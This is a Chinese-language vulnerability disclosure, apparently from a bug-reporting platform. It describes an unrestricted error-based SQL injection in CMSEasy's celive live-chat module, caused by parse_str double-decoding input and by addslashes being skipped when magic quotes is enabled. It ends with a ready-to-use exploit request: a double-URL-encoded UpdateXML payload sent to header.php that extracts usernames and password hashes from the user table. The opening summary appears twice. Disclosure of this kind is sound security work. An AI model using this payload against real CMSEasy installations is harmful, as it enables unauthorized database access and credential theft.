### 简要描述: cmseasy 无限制报错注入(可获取全站信息exp) ### 详细说明: 问题还是出在clive 上面,但是跟以往的不同的是,xjxquery 这个上面就发生了问题,看代码: xajax.class.php: ``` if ($rootTag == "xjxquery") { $sQuery = ""; $this->iPos++; while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) { if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) { $this->iPos++; continue; } $sQuery .= $this->aObjArray[$this->iPos]; $this->iPos++; } parse_str($sQuery, $aArray); if ($this->bDecodeUTF8Input) { foreach ($aArray as $key => $value) { $aArray[$key] = $this->_decodeUTF8Data($value); } } if (get_magic_quotes_gpc() == 1) { $newArray = array(); foreach ($aArray as $sKey => $sValue) { if (is_string($sValue)) $newArray[$sKey] = stripslashes($sValue); else $newArray[$sKey] = $sValue; } $aArray = $newArray; } } return $aArray; } ``` 问题发生在哪里了: parse_str($sQuery, $aArray); 这个函数,本身会对url编码进行一次decode的 测试一下 ``` <?php echo $_GET['b']; echo " "; parse_str($_GET['b']); echo $a; ?> ``` [<img...
### 简要描述: cmseasy 无限制报错注入(可获取全站信息exp) ### 详细说明: 问题还是出在clive 上面,但是跟以往的不同的是,xjxquery 这个上面就发生了问题,看代码: xajax.class.php: ``` if ($rootTag == "xjxquery") { $sQuery = ""; $this->iPos++; while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) { if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) { $this->iPos++; continue; } $sQuery .= $this->aObjArray[$this->iPos]; $this->iPos++; } parse_str($sQuery, $aArray); if ($this->bDecodeUTF8Input) { foreach ($aArray as $key => $value) { $aArray[$key] = $this->_decodeUTF8Data($value); } } if (get_magic_quotes_gpc() == 1) { $newArray = array(); foreach ($aArray as $sKey => $sValue) { if (is_string($sValue)) $newArray[$sKey] = stripslashes($sValue); else $newArray[$sKey] = $sValue; } $aArray = $newArray; } } return $aArray; } ``` 问题发生在哪里了: parse_str($sQuery, $aArray); 这个函数,本身会对url编码进行一次decode的 测试一下 ``` <?php echo $_GET['b']; echo " "; parse_str($_GET['b']); echo $a; ?> ``` [<img src="https://images.seebug.org/upload/201508/26090436e3ebc6d9b0b2608c691b30b4744c8aae.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/26090436e3ebc6d9b0b2608c691b30b4744c8aae.png) 成立 第二处逻辑 如果gpc开启的话,它会进行一次stripslashes ``` if (get_magic_quotes_gpc() == 1) { $newArray = array(); foreach ($aArray as $sKey => $sValue) { if (is_string($sValue)) $newArray[$sKey] = stripslashes($sValue); ``` 以往的 注册函数有两个前台可以利用: Postdata 和 LiveMessage 看看LiveMessage: ``` function LiveMessage($a) { global $db; $sessionid = $_SESSION['sessionid']; $name = addslashes(htmlspecialchars($a['name'])); $email = addslashes(htmlspecialchars($a['email'])); $country = addslashes(htmlspecialchars($a['country'])); $phone = addslashes(htmlspecialchars($a['phone'])); $departmentid = addslashes(htmlspecialchars($a['departmentid'])); $message = addslashes(htmlspecialchars($a['message'])); ``` 所有的参数都被addslashes 我们在看看: Postdata function Postdata($a) { global $db; $chatid = $_SESSION['chatid']; $name = $_SESSION['name']; $a['detail'] = htmlspecialchars($a['detail']); if (!get_magic_quotes_gpc()) { $a['detail'] = addslashes($a['detail']); } 如果gpc开启的话,就不进行addslashes 好的 直接exp 发送url: http://localhost/Cmseasy/celive/live/header.php postdata: xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery> [<img src="https://images.seebug.org/upload/201508/2609100916fa57cd969ddf1cec6343a368635202.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/2609100916fa57cd969ddf1cec6343a368635202.png) ### 漏洞证明:
